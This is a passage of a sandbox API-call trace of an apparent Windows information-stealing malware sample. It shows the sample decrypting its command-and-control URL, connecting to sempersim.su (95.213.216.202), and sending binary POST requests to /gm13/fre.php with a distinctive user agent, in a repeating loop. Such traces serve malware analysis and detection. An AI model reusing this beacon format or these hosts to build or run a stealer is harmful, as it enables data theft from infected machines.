(lpLibFileName="shlwapi") returned 0x74df0000 [0223.540] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0223.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0223.541] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0223.541] GetProcessHeap () returned 0x620000 [0223.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0223.541] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0223.544] GetProcessHeap () returned 0x620000 [0223.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b6a0 [0223.544] socket (af=2, type=1, protocol=6) returned 0x398 [0223.545] connect (s=0x398, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0223.592] FreeAddrInfoW (pAddrInfo=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0223.592] GetProcessHeap () returned 0x620000 [0223.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0223.592] GetProcessHeap () returned 0x620000 [0223.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0223.593] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0223.594] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0223.594] GetProcessHeap () returned 0x620000 [0223.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0223.594] GetProcessHeap () returned 0x620000 [0223.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0223.595] GetProcessHeap () returned 0x620000 [0223.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0223.595] GetProcessHeap () returned 0x620000 [0223.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0223.596] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0223.597] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0223.597] GetProcessHeap () returned 0x620000 [0223.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0223.597] GetProcessHeap () returned 0x620000 [0223.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0223.597] send (s=0x398, buf=0x63a880*, len=237, flags=0) returned 237 [0223.598] send (s=0x398, buf=0x6421e0*, len=159, flags=0) returned 159 [0223.598] GetProcessHeap () returned 0x620000 [0223.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0223.598] recv (in: s=0x398, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0224.833] GetProcessHeap () returned 0x620000 [0224.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0224.834] GetProcessHeap () returned 0x620000 [0224.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0224.834] GetProcessHeap () returned 0x620000 [0224.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0224.835] GetProcessHeap () returned 0x620000 [0224.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0224.835] closesocket (s=0x398) returned 0 [0224.836] GetProcessHeap () returned 0x620000 [0224.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0224.836] GetProcessHeap () returned 0x620000 [0224.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0224.836] GetProcessHeap () returned 0x620000 [0224.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0224.836] GetProcessHeap () returned 0x620000 [0224.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0224.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x940) returned 0x398 [0224.839] Sleep (dwMilliseconds=0xea60) [0224.858] GetProcessHeap () returned 0x620000 [0224.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f30 [0224.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.860] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.874] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0224.880] GetProcessHeap () returned 0x620000 [0224.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0224.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.881] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0224.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.882] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.883] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.883] GetProcessHeap () returned 0x620000 [0224.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0224.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.884] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f30, pdwDataLen=0x19fcfc | out: pbData=0x642f30, pdwDataLen=0x19fcfc) returned 1 [0224.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.885] CryptDestroyKey (hKey=0x62d190) returned 1 [0224.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.889] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0224.889] GetProcessHeap () returned 0x620000 [0224.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0224.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0224.890] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0224.891] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0224.892] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0224.893] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.893] GetProcessHeap () returned 0x620000 [0224.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0224.893] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.893] GetProcessHeap () returned 0x620000 [0224.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0224.894] GetProcessHeap () returned 0x620000 [0224.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0224.894] GetProcessHeap () returned 0x620000 [0224.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0224.894] GetProcessHeap () returned 0x620000 [0224.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0224.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.937] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0224.986] GetProcessHeap () returned 0x620000 [0224.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0224.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.987] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0224.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.988] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.989] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.989] GetProcessHeap () returned 0x620000 [0224.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0224.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.991] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0224.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.992] CryptDestroyKey (hKey=0x62d190) returned 1 [0224.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0224.993] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0224.993] GetProcessHeap () returned 0x620000 [0224.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0224.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0224.994] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0225.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0225.041] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0225.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0225.043] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0225.043] GetProcessHeap () returned 0x620000 [0225.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0225.043] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c528*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0225.044] GetProcessHeap () returned 0x620000 [0225.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0225.044] socket (af=2, type=1, protocol=6) returned 0x39c [0225.045] connect (s=0x39c, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0225.094] FreeAddrInfoW (pAddrInfo=0x63c528*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0225.094] GetProcessHeap () returned 0x620000 [0225.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0225.095] GetProcessHeap () returned 0x620000 [0225.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0225.095] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0225.096] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0225.096] GetProcessHeap () returned 0x620000 [0225.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0225.096] GetProcessHeap () returned 0x620000 [0225.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0225.097] GetProcessHeap () returned 0x620000 [0225.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643368 [0225.097] GetProcessHeap () returned 0x620000 [0225.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0225.098] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0225.099] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0225.099] GetProcessHeap () returned 0x620000 [0225.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0225.099] GetProcessHeap () returned 0x620000 [0225.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0225.099] send (s=0x39c, buf=0x63a880*, len=237, flags=0) returned 237 [0225.100] send (s=0x39c, buf=0x6421e0*, len=159, flags=0) returned 159 [0225.100] GetProcessHeap () returned 0x620000 [0225.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0225.100] recv (in: s=0x39c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0226.765] GetProcessHeap () returned 0x620000 [0226.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0226.766] GetProcessHeap () returned 0x620000 [0226.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0226.766] GetProcessHeap () returned 0x620000 [0226.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0226.767] GetProcessHeap () returned 0x620000 [0226.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0226.767] closesocket (s=0x39c) returned 0 [0226.768] GetProcessHeap () returned 0x620000 [0226.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0226.768] GetProcessHeap () returned 0x620000 [0226.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0226.768] GetProcessHeap () returned 0x620000 [0226.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0226.768] GetProcessHeap () returned 0x620000 [0226.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0226.769] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbbc) returned 0x39c [0226.770] Sleep (dwMilliseconds=0xea60) [0226.780] GetProcessHeap () returned 0x620000 [0226.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0226.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.782] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.791] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0226.803] GetProcessHeap () returned 0x620000 [0226.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0226.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.804] CryptImportKey (in: hProv=0x63ba08, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0226.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.805] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.806] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.806] GetProcessHeap () returned 0x620000 [0226.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0226.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.812] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0226.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.813] CryptDestroyKey (hKey=0x62d710) returned 1 [0226.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.814] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0226.814] GetProcessHeap () returned 0x620000 [0226.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0226.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.815] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.817] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.818] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.819] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.819] GetProcessHeap () returned 0x620000 [0226.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0226.819] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0226.819] GetProcessHeap () returned 0x620000 [0226.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0226.820] GetProcessHeap () returned 0x620000 [0226.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0226.820] GetProcessHeap () returned 0x620000 [0226.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0226.820] GetProcessHeap () returned 0x620000 [0226.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0226.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.822] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.831] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0226.838] GetProcessHeap () returned 0x620000 [0226.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0226.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.839] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0226.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.843] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.844] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.844] GetProcessHeap () returned 0x620000 [0226.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0226.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.846] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0226.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.847] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0226.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0226.848] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0226.848] GetProcessHeap () returned 0x620000 [0226.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0226.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.849] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0226.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.850] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0226.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.851] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0226.851] GetProcessHeap () returned 0x620000 [0226.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0226.851] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bf88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0226.858] GetProcessHeap () returned 0x620000 [0226.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b650 [0226.858] socket (af=2, type=1, protocol=6) returned 0x3a0 [0226.859] connect (s=0x3a0, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0226.924] FreeAddrInfoW (pAddrInfo=0x63bf88*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0226.924] GetProcessHeap () returned 0x620000 [0226.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0226.924] GetProcessHeap () returned 0x620000 [0226.925] 